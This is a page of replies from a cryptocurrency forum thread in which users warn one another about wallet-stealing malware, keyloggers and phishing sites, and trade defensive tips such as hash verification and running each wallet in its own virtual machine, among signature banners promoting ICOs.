Offline Offline

Activity: 39


View Profile
June 20, 2017, 03:51:22 PM
 #132

And PLEASE do not rely on Virustotal for verifying that a file is safe. If VT says it's bad then it's highly likely bad. If VT detects nothing it does not mean the file is clean. It means that none of the antivirus engines on VT detected anything bad. It is not that difficult to fool antivirus software.

I would also upload the file to someplace like https://malwr.com/submission/ or http://www.threatexpert.com/submit.aspx to see if anything malicious is detected.
BtcBotting
Newbie
*
Offline Offline

Activity: 3


View Profile
June 23, 2017, 09:24:47 AM
 #133

The thing to really worry about right now is all the NSA exploits/malware floating about..
rkyass
Member
**
Offline Offline

Activity: 72


View Profile
June 29, 2017, 12:13:31 PM
 #134

Thanks this was very informative. I knew that this forum was a potential target for scammers that's why i never clicked on any suspicious link. Better be safe than sorry ! There are also some ICO where you will find a lot of scammers, and one should be careful specially on ethereum crowdsales as some people will just send you their own eth adress saying that it is the ICOs smart contract address. A lot of people have been scammed this way !
romecheo
Full Member
***
Online Online

Activity: 182



View Profile
July 04, 2017, 01:49:07 AM
 #135

I am too grateful for all the information which shared on this forums, very informative and details, thank you very much for helping us.

 

kaleparas
Newbie
*
Offline Offline

Activity: 3


View Profile
July 05, 2017, 02:36:51 PM
 #136

Could you please post the coin's name and maybe others that you may have found ?

This is found in the "Lucky7coin" source code, as linked above.

This is very helpful information. Thank you !!

Get Free ONIONs https://deeponion.org/apply
Josef27
Hero Member
*****
Offline Offline

Activity: 784


View Profile
July 11, 2017, 07:02:21 PM
 #137

Could you please post the coin's name and maybe others that you may have found ?

This is found in the "Lucky7coin" source code, as linked above.

This is very helpful information. Thank you !!

Thanks! ... You have to stop being cheap! I'm talking to myself here. I'm going to force myself to buy a 100-200.00 used older HP Elite book off Ebay just to deal with my non hardware wallet coins. It's just not worth the risk of cross contamination. No surfing or emails or apps on it. Just the business side of coins and then off the net.
MWesterweele
Hero Member
*****
Offline Offline

Activity: 672



View Profile
July 12, 2017, 12:19:20 PM
 #138

So using Linux or Ubuntu Helps?
maybe yes, it is not prone to any attacks due to its high security, recently i have been received an email i thought that it was legit i feel so happy that day but then i realized that the site extension is not that one and then i asked my friend about it and then i proove that it is fake so be careful guys.

..C..
.....................
........What is C?.........
..............
...........ICO            Dec 1st – Dec 30th............
       ............Open            Dec 1st- Dec 30th............
...................ANN thread      Bounty....................

qiwoman2
Legendary
*
Offline Offline

Activity: 1302



View Profile WWW
July 13, 2017, 05:53:36 AM
 #139

Unfortunate although this forum is the go to place for all things Bitcoin and Altcoin, it's also a hot bed for thieves and really nasty elements. I have had a small fortune stolen over the years and the latest was over 1 btc from the myetherwallet phishing hack. Now these etherwallet hackers are all over the slack rooms sending pms in every single altcoin eth token room. It's getting to the point where I don't even like to use ETH anymore but I have no choice as most of these new tokens are being issued on the ETH protocol.  Cry Many times I wanted to leave Crypto because of these thieves and hackers but it's all I got. I don't have any other job or source of income.

    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   
   ████████████████████████████████  
     ▀██████████████████████████▀    
        ▀████████████████████▀       
          ████████████████▀         
            █████████████           
            ▀████████████▀           
             ▀██████████▀            
              ██████████             
               ████████              
               ▀██████▀              
                ██████               
                  ▀                  
.
.trade.io.
██████
██████
███
███
███
███
███
███
███
███
███
██████
██████

▄██████████████████▄
███       ▀███████
███       █████████
███       █████████
███       █████████
███              ██
███   ▄▄▄▄▄▄▄▄   ███
███   ▄▄▄▄▄▄▄▄   ███
███              ███
███▄▄▄▄▄▄▄▄▄▄▄▄▄▄███
██████████████████▀

▄██████████████████▄
███████████▀ ███████
█████████▀   ███████
███████▀     ██▀ ███
███ ▀▀       █▄▄████
███          █▀▀▀▀██
███ ▄▄       ███████
██████▄     █▄ ▀███
█████████▄   ███▄███
███████████▄ ███████
▀██████████████████▀

▄██████████████████▄
████████████████████
███████████████▀▀ ██
█████████▀▀     ███
████▀▀     ▄█▀   ███
███▄    ▄██      ███
█████████▀      ▄██
█████████▄     ████
█████████████▄ ▄████
████████████████████
▀██████████████████▀
██████
██████
   ███
   ███
   ███
   ███
   ███
   ███
   ███
   ███
   ███
██████
██████
.
.Join the Trading Revolution.
flag39
Full Member
***
Offline Offline

Activity: 168



View Profile WWW
July 13, 2017, 02:28:33 PM
 #140

Is there any way to know if i have a keylogger in bios or somewhere else?  thnaks

<OPEN MONEY | Powering Blockchain Acceptance [ICO]
███████████████    ▬▬▬▬▬▬ Blockchain Meets Mainstream! ▬▬▬▬▬▬    ███████████████
Whitepaper  ●  Slack  ●  Facebook  ●  Twitter  ●  Reddit  ●  Telegram>
Bellator
Sr. Member
****
Offline Offline

Activity: 476



View Profile
July 13, 2017, 04:26:35 PM
 #141

Is there any way to know if i have a keylogger in bios or somewhere else?  thnaks
Hmmm try to full scan your pc i think and if you are too suspicious try to reformat your pc for assurance that nobody has been left that may steal your infos. But think that reformat is the very last idea you may do.

██████████████████████████
█████████████     ████████
███████████       ████████
███████████    ███████████
███████████    ███████████
████████          ████████
████████          ████████
███████████    ███████████
███████████    ███████████
███████████    ███████████
███████████    ███████████
███████████    ███████████
██████████████████████████
   
██████████████████████████
██████████████████████████
██████████████████████████
████ █████████      ██████
████    █████        █████
█████               ██████
██████             ███████
███████           ████████
████████        ██████████
██████       █████████████
██████████████████████████
██████████████████████████
██████████████████████████
 
██████████████████████████
██████████████████████████
████████████████████   ███
████████████████  ███ ████
████████████    ███   ████
████████      ███    █████
████        ███      █████
██████    ███       ██████
███████████         ██████
██████████   █     ███████
██████████ ███████ ███████
██████████████████████████
██████████████████████████
 
▬▬▬▬▬▬▬▬▬ TOKENLOYALTY.IO ▬▬▬▬▬▬▬▬▬
▬▬▬▬▬▬▬▬▬ DAO ecosystem for loyalty programs: YOUTUBE ▬▬▬▬▬▬▬▬▬
▬▬▬▬▬▬▬▬LOOK AT THE WHITEPAPER▬▬▬▬▬▬▬▬
 
██████████████████████████████████████
██████████████████████████████████████
██████████████████████████████████████
████████████████████████████    ██████
███████████████████████████      █████
██████ █████████   █████████    ██████
████████ ██████     ██████████████████
██████████ █████   ██████     ████████
████████████ ███████████       ███████
██████████████ █████████       ███████
█████   ████████ ████████     ████████
████     █████████ ███████████████████
█████   ████████████ █████████████████
██████████████████████ ███████████████
████   ███████    ██████ █████████████
███     █████      ███████ ███████████
████   ██████      █████████ █████████
██████████████    ████████████████████
██████████████████████████████████████
██████████████████████████████████████
  Whitepaper
How to buy
Roadmap
keeee
Full Member
***
Offline Offline

Activity: 210



View Profile
July 13, 2017, 05:08:09 PM
 #142

*bitcoinwisdomapp.com
Let it be on the list sir, it will victimize us, it's a keylogger.

To avoid the negative effects that can we get from those malware, it is suggested to run each wallet or miner in a different virtual machine with virtualbox. Its one best solution.

Btw thank you sir in informing us. It was a big help and a warning as well.

fuer44
Full Member
***
Offline Offline

Activity: 224



View Profile
July 18, 2017, 11:25:46 AM
 #143

In addition to WannaCry there is another dangerous and sophisticated virus. One of them is Kelihos.
Kelihos is a botnet and sometimes known as Hlux. The target of this virus is to spam and steal BitCoin. The most dangerous, is the theft of BitCoin. BitCoin price is very expensive and has skyrocketed to Rp 25 million more. Imagine you lost that precious BitCoin.

MWesterweele
Hero Member
*****
Offline Offline

Activity: 672



View Profile
July 18, 2017, 02:18:00 PM
 #144

In addition to WannaCry there is another dangerous and sophisticated virus. One of them is Kelihos.
Kelihos is a botnet and sometimes known as Hlux. The target of this virus is to spam and steal BitCoin. The most dangerous, is the theft of BitCoin. BitCoin price is very expensive and has skyrocketed to Rp 25 million more. Imagine you lost that precious BitCoin.
Oh no , i have been known it only now. So guys please  be aware in everything and let use be wise in all our doings to avoid any malware that we may have been encounter.

..C..
.....................
........What is C?.........
..............
...........ICO            Dec 1st – Dec 30th............
       ............Open            Dec 1st- Dec 30th............
...................ANN thread      Bounty....................

Bellator
Sr. Member
****
Offline Offline

Activity: 476



View Profile
July 20, 2017, 05:24:54 PM
 #145

In addition to WannaCry there is another dangerous and sophisticated virus. One of them is Kelihos.
Kelihos is a botnet and sometimes known as Hlux. The target of this virus is to spam and steal BitCoin. The most dangerous, is the theft of BitCoin. BitCoin price is very expensive and has skyrocketed to Rp 25 million more. Imagine you lost that precious BitCoin.
Oh no , i have been known it only now. So guys please  be aware in everything and let use be wise in all our doings to avoid any malware that we may have been encounter.
yeah, bitcoin is huge right now so therefore people will be greedy and they will make anything for money, they will send scam links in many people with a most pleasing content that users may be believe but it cointains viruses.

██████████████████████████
█████████████     ████████
███████████       ████████
███████████    ███████████
███████████    ███████████
████████          ████████
████████          ████████
███████████    ███████████
███████████    ███████████
███████████    ███████████
███████████    ███████████
███████████    ███████████
██████████████████████████
   
██████████████████████████
██████████████████████████
██████████████████████████
████ █████████      ██████
████    █████        █████
█████               ██████
██████             ███████
███████           ████████
████████        ██████████
██████       █████████████
██████████████████████████
██████████████████████████
██████████████████████████
 
██████████████████████████
██████████████████████████
████████████████████   ███
████████████████  ███ ████
████████████    ███   ████
████████      ███    █████
████        ███      █████
██████    ███       ██████
███████████         ██████
██████████   █     ███████
██████████ ███████ ███████
██████████████████████████
██████████████████████████
 
▬▬▬▬▬▬▬▬▬ TOKENLOYALTY.IO ▬▬▬▬▬▬▬▬▬
▬▬▬▬▬▬▬▬▬ DAO ecosystem for loyalty programs: YOUTUBE ▬▬▬▬▬▬▬▬▬
▬▬▬▬▬▬▬▬LOOK AT THE WHITEPAPER▬▬▬▬▬▬▬▬
 
██████████████████████████████████████
██████████████████████████████████████
██████████████████████████████████████
████████████████████████████    ██████
███████████████████████████      █████
██████ █████████   █████████    ██████
████████ ██████     ██████████████████
██████████ █████   ██████     ████████
████████████ ███████████       ███████
██████████████ █████████       ███████
█████   ████████ ████████     ████████
████     █████████ ███████████████████
█████   ████████████ █████████████████
██████████████████████ ███████████████
████   ███████    ██████ █████████████
███     █████      ███████ ███████████
████   ██████      █████████ █████████
██████████████    ████████████████████
██████████████████████████████████████
██████████████████████████████████████
  Whitepaper
How to buy
Roadmap
Gens09
Sr. Member
****
Offline Offline

Activity: 252



View Profile
July 21, 2017, 01:18:10 PM
 #146

Thanks for being on top of this and keeping us informed, we do appreciate it!

I think having a desktop wallet is very prone to this.
Vulnerability is high in this case. I guess better to always back up your wallet or choose a safer one.

deddod01
Full Member
***
Offline Offline

Activity: 168



View Profile
July 22, 2017, 07:45:38 AM
 #147

Just add, so that our PC is not directly exposed to Malware
1. Make sure your computer / pc is always renewable
2.Do not be fooled by downloading unknown software

               SpectivVR                                                           Crowdsale: 12/08 - 12/29
VR Streaming Platform & Attention Markets                    [ Website ]
BitcoinTalk   |   Slack   |   Twitter   |   LinkedIn   |   Medium   |   Facebook   |   Instagram
Zrs
Full Member
***
Offline Offline

Activity: 210


"Proof-of-Asset Protocol"


View Profile
July 22, 2017, 08:00:37 AM
 #148

Is there any way to know if i have a keylogger in bios or somewhere else?  thnaks
Hmmm try to full scan your pc i think and if you are too suspicious try to reformat your pc for assurance that nobody has been left that may steal your infos. But think that reformat is the very last idea you may do.

Same question also i want to ask and i need reply. which one apps i mean software should  i use for scan my computer? now i am using avast a free antivirus  downloaded from internet . is it work properly or i have to buy premium service? someone clear it to me.thanks in advanced.

vapourminer
Legendary
*
Offline Offline

Activity: 1423

what is this "brake pedal" you speak of?


View Profile
July 22, 2017, 11:12:49 AM
 #149

Is there any way to know if i have a keylogger in bios or somewhere else?  thnaks
Hmmm try to full scan your pc i think and if you are too suspicious try to reformat your pc for assurance that nobody has been left that may steal your infos. But think that reformat is the very last idea you may do.

Same question also i want to ask and i need reply. which one apps i mean software should  i use for scan my computer? now i am using avast a free antivirus  downloaded from internet . is it work properly or i have to buy premium service? someone clear it to me.thanks in advanced.

i use avast free. works fine but the paid version has more features that may be beneficial for noobs but i have no use for them.

but the real trick to avoiding virus/trojans is to update your os and programs regularly, stay off shady sites and not download cracked software.

only download from the authors site when you can. learn how md5/sha hashes work and verify your downloads with it, especially wallets.

dont download wallets for crapcoins willy nilly many have trojans. if you must use a virtual pc and even then be careful.
Zrs
Full Member
***
Offline Offline

Activity: 210


"Proof-of-Asset Protocol"


View Profile
July 23, 2017, 11:54:26 AM
 #150

Is there any way to know if i have a keylogger in bios or somewhere else?  thnaks
Hmmm try to full scan your pc i think and if you are too suspicious try to reformat your pc for assurance that nobody has been left that may steal your infos. But think that reformat is the very last idea you may do.

Same question also i want to ask and i need reply. which one apps i mean software should  i use for scan my computer? now i am using avast a free antivirus  downloaded from internet . is it work properly or i have to buy premium service? someone clear it to me.thanks in advanced.

i use avast free. works fine but the paid version has more features that may be beneficial for noobs but i have no use for them.

but the real trick to avoiding virus/trojans is to update your os and programs regularly, stay off shady sites and not download cracked software.

only download from the authors site when you can. learn how md5/sha hashes work and verify your downloads with it, especially wallets.

dont download wallets for crapcoins willy nilly many have trojans. if you must use a virtual pc and even then be careful.
Virtual pc? what is this? remote desktop or not? may i use virtual pc for installing a wallet ? I have seen huge number of people lost their coin by downloading entrusted wallet.so i am not installing any wallet or software in my computer.But when any Airdrop occurs , what i will do? with out downloading their wallet it cant possible to join the airdrop.any suggestion,warning ?


vapourminer
Legendary
*
Offline Offline

Activity: 1423

what is this "brake pedal" you speak of?


View Profile
July 23, 2017, 02:08:38 PM
 #151

Same question also i want to ask and i need reply. which one apps i mean software should  i use for scan my computer? now i am using avast a free antivirus  downloaded from internet . is it work properly or i have to buy premium service? someone clear it to me.thanks in advanced.

i use avast free. works fine but the paid version has more features that may be beneficial for noobs but i have no use for them.

but the real trick to avoiding virus/trojans is to update your os and programs regularly, stay off shady sites and not download cracked software.

only download from the authors site when you can. learn how md5/sha hashes work and verify your downloads with it, especially wallets.

dont download wallets for crapcoins willy nilly many have trojans. if you must use a virtual pc and even then be careful.
Virtual pc? what is this? remote desktop or not? may i use virtual pc for installing a wallet ? I have seen huge number of people lost their coin by downloading entrusted wallet.so i am not installing any wallet or software in my computer.But when any Airdrop occurs , what i will do? with out downloading their wallet it cant possible to join the airdrop.any suggestion,warning ?

https://en.wikipedia.org/wiki/Virtual_machine

it allows you run run software so it cannot interact with the real pc its running on, or other vms on the same machine. theory is any malware is contained in just that the virtual machine.

you can run many vms on one real pc. so you run one wallet per vm and if one is malware it cannot affect the other stuff on the other vms. so basically is a jail malware cannot escape from.

you dedicate a vm to one altcoin wallet and run nothing else in that vm (except antivirus and a browser to get the wallet). so malware has nothing to steal/compromise. of course that wallet may be able to steal your coins from itself, but it cant steal coins from wallets running on other vms. ie it does not prevent trojans from running but it contains the damage. and you never enter sensitive info or enter sensitive sites on that vm (like no visiting exchange sites/email accounts) so it cannot collect passwords or anything. you use a regular machine for exchanges/email/whatever, or even a vm set up for just email/exchanges.

however.. its still not 100% perfect depending on how you set up it there can still be risks. but in general its quit safe.

there are many vms that are free. you can run windows and *nix on vms.
negancoin
Full Member
***
Online Online

Activity: 168


Privacy Focused Blockchain Timestamping Office


View Profile
July 25, 2017, 02:16:57 AM
 #152

very informative for newbies, I always scan files with malwarebytes , I trust this program.

▀▀█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ AMLT by Coinfirm ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▀▀
▬▬▬▬▬▬▬ The Token of Compliance ▬▬▬▬▬▬▬
▖▖▖▖▖▙▗▗▗ Facebook   ❱ ❱  Twitter   ❱ ❰  Telegram▖▖▖▟▗▗▗▗▗
Zrs
Full Member
***
Offline Offline

Activity: 210


"Proof-of-Asset Protocol"


View Profile
July 26, 2017, 06:13:33 AM
 #153

Same question also i want to ask and i need reply. which one apps i mean software should  i use for scan my computer? now i am using avast a free antivirus  downloaded from internet . is it work properly or i have to buy premium service? someone clear it to me.thanks in advanced.

i use avast free. works fine but the paid version has more features that may be beneficial for noobs but i have no use for them.

but the real trick to avoiding virus/trojans is to update your os and programs regularly, stay off shady sites and not download cracked software.

only download from the authors site when you can. learn how md5/sha hashes work and verify your downloads with it, especially wallets.

dont download wallets for crapcoins willy nilly many have trojans. if you must use a virtual pc and even then be careful.
Virtual pc? what is this? remote desktop or not? may i use virtual pc for installing a wallet ? I have seen huge number of people lost their coin by downloading entrusted wallet.so i am not installing any wallet or software in my computer.But when any Airdrop occurs , what i will do? with out downloading their wallet it cant possible to join the airdrop.any suggestion,warning ?

https://en.wikipedia.org/wiki/Virtual_machine

it allows you run run software so it cannot interact with the real pc its running on, or other vms on the same machine. theory is any malware is contained in just that the virtual machine.

you can run many vms on one real pc. so you run one wallet per vm and if one is malware it cannot affect the other stuff on the other vms. so basically is a jail malware cannot escape from.

you dedicate a vm to one altcoin wallet and run nothing else in that vm (except antivirus and a browser to get the wallet). so malware has nothing to steal/compromise. of course that wallet may be able to steal your coins from itself, but it cant steal coins from wallets running on other vms. ie it does not prevent trojans from running but it contains the damage. and you never enter sensitive info or enter sensitive sites on that vm (like no visiting exchange sites/email accounts) so it cannot collect passwords or anything. you use a regular machine for exchanges/email/whatever, or even a vm set up for just email/exchanges.

however.. its still not 100% perfect depending on how you set up it there can still be risks. but in general its quit safe.

there are many vms that are free. you can run windows and *nix on vms.

Thank you boss for your kind information. Just bookmarked the site: https://en.wikipedia.org/wiki/Virtual_machine and try to read them carefully.also you described it nicely.will try to use it and review here about it.best regards
Zrs

Kaller
Hero Member
*****
Offline Offline

Activity: 525


★Jetwin.com★


View Profile
August 04, 2017, 10:05:39 PM
 #154

Some guy lost $150,000 of Bitcoins (50 BTC) a couple days ago trying to get access to his Bitcoin Cash.
He downloaded a malware "wallet" from an unknown site, but after opening the .exe file found his Bitcoin had all been stolen.
Let this be a reminder to all that you should be very careful about clicking links, downloading/installing programs, etc. related to cryptocurrencies!


▄▄▄████████▄▄▄
▄▄███▀▀▀ ▄  ▄ ▀▀▀███▄▄
▄██▀▀ ▄▄████  ████▄▄ ▀▀██▄
▄██▀ ▄███████    ███████▄ ▀██▄
██▀ ▄████████▀    ▀████████▄ ▀██
██▀ ██████████      ██████████ ▀██
██▀ ██████████        ██████████ ▀██
▄██                                ██▄
██ ▄                              ▄ ██
██ ███▄                        ▄███ ██
██ ██████▄                  ▄██████ ██
██ ▀████████              ████████▀ ██
▀██ ███████                ███████ ██▀
██▄ █████▀                ▀█████ ▄██
██▄ ████        ▄▄        ████ ▄██
██▄ ▀█      ▄▄████▄▄      █▀ ▄██
██▄    ▄▄██████████▄▄    ▄██▀
▀██▄▄ ▀▀██████████▀▀ ▄▄██▀
▀▀███▄▄▄ ▀▀▀▀ ▄▄▄███▀▀
▀▀▀████████▀▀▀
 

    [    ]
Muhammad Muneeb
Full Member
***
Offline Offline

Activity: 140


Best IoT Platform Based on Blockchain


View Profile
August 06, 2017, 09:12:41 PM
 #155

 Shocked what we really need to do to remain uninfected from the malware... since with the growth of bitcoin bad people are trying to steal the bitcoin with the different ways..

DAVETUN
Full Member
***
Offline Offline

Activity: 168



View Profile
August 07, 2017, 07:36:50 PM
 #156

My system was infected with malware, I use avg anti virus version and it help to discover and deleted it
.I recomend this and also ensure you dont visit site that entice with earning free btc or altcoin,lot of scammers and thiefs out there.

chichigirl
Full Member
***
Offline Offline

Activity: 238


Next.Exchange - Decentralized Stock Market Exchang


View Profile
August 10, 2017, 10:21:53 AM
 #157

hi guys, I have a problem, I have just log my MyEtherWallet wallet private key into a fake MyEtherWallet site. I just dont know what to do. Is there any way to change the private key? The ETH wallet has no coins anyway, but soon it will have (from bounties). Please advice me what to do?

Jake Roberson
Member
**
Offline Offline

Activity: 112


View Profile
August 11, 2017, 03:59:11 PM
 #158

Thanks for the significant attention, based on BTC protection which could be absorbed for some technical reasons, if not you, appreciate that!
casey.anthony195
Full Member
***
Offline Offline

Activity: 140



View Profile
August 11, 2017, 04:01:58 PM
 #159

Thank you for listing all of this here. This post actually saved my money twice(!) today, as some guys tried to replace download links in the discussion on the other forums.
oreits11
Full Member
***
Offline Offline

Activity: 168



View Profile
August 11, 2017, 06:58:32 PM
 #160


different basics on customs with personal profiles as users of altcoins to decide with strategics as occupying use of tools and utility as helps with the running of manage to gains with the better returns on complements.
as measuring counts with the focus on view with the appreciation on distinct on parts with the commons on variables to turns with the following on priors as closing with the decision as gains of returns of exchange.

the specifics of details on casuals to bring to mechanical practice of functional system as expert from the different background of ideal works with the offers on jobs market as accepting request from the buyer of the wider networks as clusters of profile with membership.



Black_bl
Full Member
***
Offline Offline

Activity: 154


View Profile
August 12, 2017, 01:13:30 PM
 #161

hi guys, I have a problem, I have just log my MyEtherWallet wallet private key into a fake MyEtherWallet site. I just dont know what to do. Is there any way to change the private key? The ETH wallet has no coins anyway, but soon it will have (from bounties). Please advice me what to do?

Create a new wallet and try to redirect the payment to your new wallet (contact dev team that will send the payment for bounties) I guess this is only possible way

Lordmancer II — MMO RPG where you can mine cryptocurrency
■■■ Pre ICO: 21.08.2017 ■ WhitePaper ■ ANN ■ Bounty ■ ICO: 23.10.2017 ■■■
Website ~ Telegram ~ FB ~ Reddit ~ Twitter
dpevoav
Newbie
*
Offline Offline

Activity: 3


View Profile
August 16, 2017, 03:53:21 PM
 #162

Some guy lost $150,000 of Bitcoins (50 BTC) a couple days ago trying to get access to his Bitcoin Cash.
He downloaded a malware "wallet" from an unknown site, but after opening the .exe file found his Bitcoin had all been stolen.
Let this be a reminder to all that you should be very careful about clicking links, downloading/installing programs, etc. related to cryptocurrencies!

SO true. What wallet was the BTC stored in?

Get Free ONION https://deeponion.org/apply TOR Int
Black_bl
Full Member
***
Offline Offline

Activity: 154


View Profile
August 17, 2017, 06:02:30 PM
 #163

I guess he used electrum and wanted to download the electrum cash wallet, but he entered on a fake site electrum.com instead of electrum.org